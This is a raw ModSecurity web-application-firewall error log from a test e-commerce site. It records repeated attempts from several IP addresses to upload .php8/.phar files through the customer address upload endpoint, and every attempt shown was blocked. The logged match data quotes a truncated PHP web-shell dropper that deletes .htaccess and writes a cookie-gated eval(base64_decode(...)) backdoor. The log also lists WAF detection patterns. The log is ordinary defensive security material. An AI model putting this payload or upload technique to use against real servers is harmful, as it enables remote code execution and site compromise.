[Fri Dec 05 12:51:25.912015 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ur88364f428d25.php8 found within FILES:custom_attributes[country_id]: ur88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTLHPagsQbwbUi5XSBYKvQAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/u/r/ur88364f428d25.phar
[Fri Dec 05 12:51:25.912688 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTLHPagsQbwbUi5XSBYKvQAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/u/r/ur88364f428d25.phar
[Fri Dec 05 12:51:25.912877 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTLHPagsQbwbUi5XSBYKvQAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/u/r/ur88364f428d25.phar
[Fri Dec 05 12:51:26.126853 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Rule 7f006a381be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.php8"] [unique_id "aTLHPqgsQbwbUi5XSBYKvgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 05 12:51:26.127364 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.php8"] [unique_id "aTLHPqgsQbwbUi5XSBYKvgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 05 12:51:26.129910 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.php8"] [unique_id "aTLHPqgsQbwbUi5XSBYKvgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 05 12:51:26.130114 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.php8"] [unique_id "aTLHPqgsQbwbUi5XSBYKvgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:13.967332 2025] [:error] [pid 551892] [client 37.112.223.135:59988] [client 37.112.223.135] ModSecurity: Rule 7f1168886be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.phar"] [unique_id "aTO6Pbs-Bpg8RBNF3C6cRwAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:13.967827 2025] [:error] [pid 551892] [client 37.112.223.135:59988] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.phar"] [unique_id "aTO6Pbs-Bpg8RBNF3C6cRwAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:13.970371 2025] [:error] [pid 551892] [client 37.112.223.135:59988] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.phar"] [unique_id "aTO6Pbs-Bpg8RBNF3C6cRwAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:13.970596 2025] [:error] [pid 551892] [client 37.112.223.135:59988] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.phar"] [unique_id "aTO6Pbs-Bpg8RBNF3C6cRwAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:14.350869 2025] [:error] [pid 551892] [client 37.112.223.135:59988] [client 37.112.223.135] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 2488364f428d25.php8 found within FILES:custom_attributes[country_id]: 2488364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTO6Prs-Bpg8RBNF3C6cSAAAAAw"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/4/2488364f428d25.phar
[Sat Dec 06 06:08:14.351526 2025] [:error] [pid 551892] [client 37.112.223.135:59988] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTO6Prs-Bpg8RBNF3C6cSAAAAAw"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/4/2488364f428d25.phar
[Sat Dec 06 06:08:14.351716 2025] [:error] [pid 551892] [client 37.112.223.135:59988] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTO6Prs-Bpg8RBNF3C6cSAAAAAw"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/4/2488364f428d25.phar
[Sat Dec 06 06:08:25.301552 2025] [:error] [pid 551921] [client 37.112.223.135:50480] [client 37.112.223.135] ModSecurity: Rule 7f1168886be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.php8"] [unique_id "aTO6SRa90AxZKzHefnF8UwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:25.302068 2025] [:error] [pid 551921] [client 37.112.223.135:50480] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.php8"] [unique_id "aTO6SRa90AxZKzHefnF8UwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:25.304621 2025] [:error] [pid 551921] [client 37.112.223.135:50480] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.php8"] [unique_id "aTO6SRa90AxZKzHefnF8UwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 06:08:25.304836 2025] [:error] [pid 551921] [client 37.112.223.135:50480] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/4/2488364f428d25.php8"] [unique_id "aTO6SRa90AxZKzHefnF8UwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.030992 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Rule 7f1168886be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.phar"] [unique_id "aTSt6QyVmHurXfTWV8msowAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.031500 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.phar"] [unique_id "aTSt6QyVmHurXfTWV8msowAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.033969 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.phar"] [unique_id "aTSt6QyVmHurXfTWV8msowAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.034196 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.phar"] [unique_id "aTSt6QyVmHurXfTWV8msowAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.109385 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: on88364f428d25.php8 found within FILES:custom_attributes[country_id]: on88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTSt6QyVmHurXfTWV8mspAAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/n/on88364f428d25.phar
[Sat Dec 06 23:27:53.110050 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTSt6QyVmHurXfTWV8mspAAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/n/on88364f428d25.phar
[Sat Dec 06 23:27:53.110233 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTSt6QyVmHurXfTWV8mspAAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/n/on88364f428d25.phar
[Sat Dec 06 23:27:53.209387 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Rule 7f1168886be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.php8"] [unique_id "aTSt6QyVmHurXfTWV8mspQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.209874 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.php8"] [unique_id "aTSt6QyVmHurXfTWV8mspQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.212327 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.php8"] [unique_id "aTSt6QyVmHurXfTWV8mspQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 06 23:27:53.212557 2025] [:error] [pid 551907] [client 185.65.202.110:43700] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/n/on88364f428d25.php8"] [unique_id "aTSt6QyVmHurXfTWV8mspQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 07 16:24:39.402565 2025] [:error] [pid 575101] [client 213.109.224.165:19769] [client 213.109.224.165] ModSecurity: Rule 7f9135098be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.phar"] [unique_id "aTWcN55-xCwpsqJ5xa2M5QAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 07 16:24:39.403183 2025] [:error] [pid 575101] [client 213.109.224.165:19769] [client 213.109.224.165] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.phar"] [unique_id "aTWcN55-xCwpsqJ5xa2M5QAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
